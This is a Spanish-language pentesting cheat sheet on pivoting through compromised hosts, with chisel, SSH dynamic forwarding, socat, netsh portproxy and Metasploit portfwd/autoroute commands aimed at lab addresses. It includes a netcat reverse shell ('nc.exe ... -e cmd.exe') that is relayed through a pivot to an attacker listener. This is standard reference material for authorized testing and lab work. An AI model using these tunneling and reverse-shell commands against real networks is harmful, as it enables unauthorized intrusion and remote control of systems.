Pivoting

Pivoting cheatsheet with chisel, socat and metasploit

Port Forwarding

Se crea una conexión entre un puerto local y un solo puerto en un objetivo, a través de un host comprometido. Esta técnica tiende a ser más rápida y más confiable que el proxy, pero solo nos permite acceder a un solo puerto (o un pequeño rango) en un solo dispositivo de destino.

Chisel Port Forwarding

Kali Machine - 192.168.100.118

chisel server --reverse -p 1234
  • reverse: permite a los clientes establecer conexiones reverse tunneling
  • p: puerto de escucha http

Ubuntu Machine - 192.168.100.135/10.0.0.2

chisel client 192.168.100.118:1234 R:127.0.0.1:80:10.0.0.3:80
  • R: <local-interface>:<local-port>:<remote-host>:<remote-port>

Metasploit Portfwd

In a meterpreter session

portfwd add -l 1234 -p 3389 -r 10.10.10.10
  • l: puerto de escucha local
  • p: puerto remoto a conectarse
  • r: host remoto a conectarse

Proxying/Tunneling

Cuando hablamos de proxy, creamos una conexión a través de una máquina comprometida para enrutar todo el tráfico deseado a la red de destino. Un proxy es útil si deseamos redirigir mucho tráfico a nuestra red de destino, por ejemplo, un escaneo NMAP o para acceder a múltiples puertos en múltiples máquinas diferentes.

Chisel Socks Proxy

Kali Machine - 192.168.100.118

chisel server --reverse -p 1234
  • reverse: permite a los clientes establecer conexiones reverse tunneling
  • p: puerto de escucha http

Ubuntu Machine - 192.168.100.135/10.0.0.2

chisel client 192.168.100.118:1234 R:socks

SSH Port Dynamic Forwarding

Kali Machine - 192.168.100.118

ssh kryot@10.0.0.2 -D 1337
  • D: puerto dinámico local

Burpsuite

Configure User Options - SOCKS Proxy
Host 127.0.0.1
Port 1337

Proxychains

nano /etc/proxychains.conf

SOCAT Tunneling

Kali Machine - 192.168.100.118

nc -lvnp 7878

Ubuntu Machine - 192.168.100.135/10.0.0.2

socat TCP-LISTEN:7777,reuseaddr,fork tcp:192.168.100.118:7878
  • TCP-LISTEN: establece puerto en escucha
  • reuseaddr: permite reutilizar el puerto después de la finalización del programa
  • fork: indicamos que socat pueda aceptar más de una conexión.

Windows Machine - 10.0.0.3

nc.exe 10.0.0.2 7777 -e cmd.exe

Windows Proxying

netsh interface portproxy add v4tov4 listenport=9999 listenaddress=0.0.0.0 connectport=9999 connectaddress=10.90.60.80

Metasploit Autoroute

In a meterpreter session

run autoroute -s 10.0.0.3 -n 255.255.255.0
  • s: host
  • n: máscara de red - default 255.255.255.0